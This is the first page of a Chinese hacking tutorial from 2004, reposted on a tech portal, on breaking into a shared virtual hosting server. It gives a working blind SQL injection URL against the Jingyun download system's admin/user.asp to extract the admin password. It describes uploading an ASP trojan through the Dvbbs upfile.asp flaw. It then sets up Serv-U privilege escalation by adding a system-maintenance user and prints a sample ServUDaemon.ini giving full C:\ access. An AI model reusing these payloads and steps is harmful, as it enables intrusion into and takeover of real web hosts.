首页 | 新闻资讯 | 软件应用 | 图形图像 | 网络应用 | 硬件学堂 | 程序开发 | 安全中心 | 素材下载 | 作者专区 | 学院论坛
精选专题 | 精美壁纸 | 专家答疑 | Flash剧场 | Photoshop | 名词解释 | 梦幻桌面 | PS高手进阶 | QQ区 | 图书 | 黑客教材
Flash教程| 卡通制作 | AutoCAD | 3DMax实例 | PS视频教程| 网页制作 | CorelDRAW| Firework | 滤镜与实例 | 全部视频教程
当前位置:eNet硅谷动力 > 学院频道 > 黑客软件

针对网络虚拟主机的渗透
2004-09-27 15:00 作者:黑鹰基地 来源:eNet论坛
【简 介】
针对网络虚拟主机的渗透
    
加入收藏  设为首页

  前几天听一树说了惊云下载系统的漏洞

  问题文件出在admin/user.asp

  提交

  http://www.xxx.com/down/admin/user.asp?user=admin' and asc(mid(pwd,1,1))>37 and '1'='1

  就相当于:

  select * from UserInfo where user='admin' and asc(mid(pwd,1,1))>37 and '1'='1'"

  详情请见

  http://play8.w1.dnscq.net/forum/index.php?showtopic=352

  利用access注入得到管理员密码

  上面有一个文件upfile.htm

  手工利用了下动网的upfile.asp漏洞

  就成功上传了个asp木马

  然后那个虚拟主机的c,d盘是NTFS分区

  不能访问E盘装着servu,php,webmail,

  F盘是虚拟站点

  servu安装目录可写~

  本来打算替换他servu文件的~但是觉的太麻烦

  还容易让管理员怀疑

  想起servu的本地提升来了

  

  在自己计算机上装了个servu

  添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限

  然后去servu安装目录里看ServUDaemon.ini

  格式是这样的

  [GLOBAL]

  Version=5.0.0.11

  LocalSetupPassword=072C63105200180D5C07170A7E3E

  LocalSetupPortNo=60628

  ProcessID=972

  [DOMAINS]

  Domain1=192.168.0.102  21 向导产生域 1 0 0

  Domain2=192.168.0.102  2121 123 2 0 0

  [Domain1]

  User1=www 1 0

  [USER=www 1]

  Password=ih0C292E1AC82920B7F384007F302A1296

  HomeDir=D:\xiaoben

  TimeOut=600

  Note1="Wizard generated account"

  Access1=D:\xiaoben RLPWAMCD

  SKEYValues=

  [Domain2]

  User1=rover 1 0

  User2=123 1 0

  [USER=rover 2]

  Password=dx5D12C060F16C7166779414FA038E881D

  HomeDir=c:\

  TimeOut=600

  Maintenance=System

  Access1=C:\ RWAMELCDP

  SKEYValues=

  [USER=123 2]

  Password=kv3F6EED70340AD1478ADF95963A07FD00

  HomeDir=c:\

  TimeOut=600

  Access1=C:\ RWAMLCDP

  SKEYValues=

  ----------------
  

热门推荐:苹果专题时尚专题



[1] [2] [3]下一页
关键字: 虚拟主机  黑客 
您对这篇文章的看法是:    喜欢 反感 支持 反对 加油 鄙视 学习 打击 佩服 漂亮 路过 发表评论
视频教程】 【专题汇总】 【不懂就问我关闭窗口

安全:设置防御小流量DDOS攻击
Photoshop给艳丽美女照片简单润色
第一张Google Chrome OS泄漏(多图)
Fagarazzi女性人物CG插画设计欣赏
iOcean数字海洋 中国版Google Ocean
相关文章
 本栏目最新文章
·用入侵检测系统提高安全系数
·运用Nessus系统扫描进行安全检测
·防止黑客侵入你正在使用的Win系统
·妙招解除极域电子教室的控制权限
·详解拒绝服务攻击的成因和实现
 精彩回放
·3DSMAX打造书本翻开效果
·共享上网技巧应用四则
·陪酒女浸泡在酒里的青春
·美女的性感靓丽婚纱设计
·妖冶身姿 死或生3壁纸
·剿灭Win XP下的29个烦恼
·黑客必备 NET命令大全
·用PS制作精致绝伦的红酒
 精彩推荐
 今日软件下载
杀毒软件免费随便用
瑞星全功能安全软件2009 基于“云安全”策略和“智能主动防御”技术开发.
www.rising.com.cn
 往日推荐
·推荐“美图秀秀”就能赚Q币
·五大搜索引擎横向评测
·防御计算机病毒十大步骤

论坛精华
·photoshop完美扣图教 
·Photoshop将美女照片 
·史上最强最多 photo 
·Photoshop给多斑的人 
·精灵女孩白夜 
·PhotoShop实例精选电 
热点推荐
绘制逼真金蛋
浪漫婚纱照片
Flash视频编程
Ulead GIF教程
热点关注
·Flash CS4 制作经典小游戏
·C语言程序设计视频教程
·PHP+MYSQL开发视频教程
·Flash CS4从入门到精通教程
·服装设计与效果图绘制教程
·21视频之Fireworks8网页制作
·Vray高级实例应用视频教程
·CorelDRAW14入门到高级教程
·Vray高级实例应用视频教程
全国计算机等级考试二级(VB语言)
往日推荐
网站重构设计
鹏哥C#教程
服装设计教程
PS唯美风景
焦点关注